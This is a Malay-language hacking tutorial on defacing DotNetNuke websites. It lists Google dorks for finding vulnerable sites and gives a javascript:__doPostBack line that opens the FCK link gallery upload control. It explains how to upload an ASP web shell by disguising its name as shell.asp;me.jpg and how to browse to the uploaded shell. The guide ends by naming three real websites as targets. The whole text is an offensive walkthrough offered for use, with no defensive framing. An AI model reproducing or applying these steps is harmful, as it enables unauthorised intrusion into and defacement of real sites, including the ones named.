hello hacker !

aku nak aja deface dengan DNN. ape DNN tu ???

DNN tu singkatan dari DotNetNuke

Okey, lets start

1.cari site yang vuln guna dork kt bawah ni : 

inurl:portals/0/

inurl:tabid/176/Default.aspx

inurl:fcklinkgallery.aspx

inurl:/fck/fcklinkgallery.aspx

search kt google dan pilih satu website

2.nanti kelua macam bawah ni : 

3.tick dekat File( Enter The Address Of The Link). nanti kelua macam bawah ni :

4.padam link di Address Bar dan replace dengan javascript ni dan click enter

javascript:__doPostBack('ctlURL$cmdUpload','')

#kalau pakai google chrome, tulis balik " javascript: " sebab kalau copy paste " javascript: " akan hilang sendiri

5.nanti kelaur macam bawah ni:

6.tekan click choose file, pilih file dan tekan upload selected file

# hanya boleh upload file macam bawah ni saja

*. docx, *.xlsx, *.pptx, *.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.spin

#korang boleh upload shell asp dengan extension seperti ini : shell.asp;me.jpg

7.kalau nak tengok file korang buat macam ni 

http://www.site.com/portals/0/filekorang.txt

kalau nak tengok shell buat macam ni

http://www.site.com/portals/0/shell.asp;me.jpg

ok siap ^^

ni site yang boleh korang deface : 

http://www.parallax.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

http://www.parkroway.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

http://www.classicrenovators.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Have A Good Day ^^

S E L A M A T M E N C U B A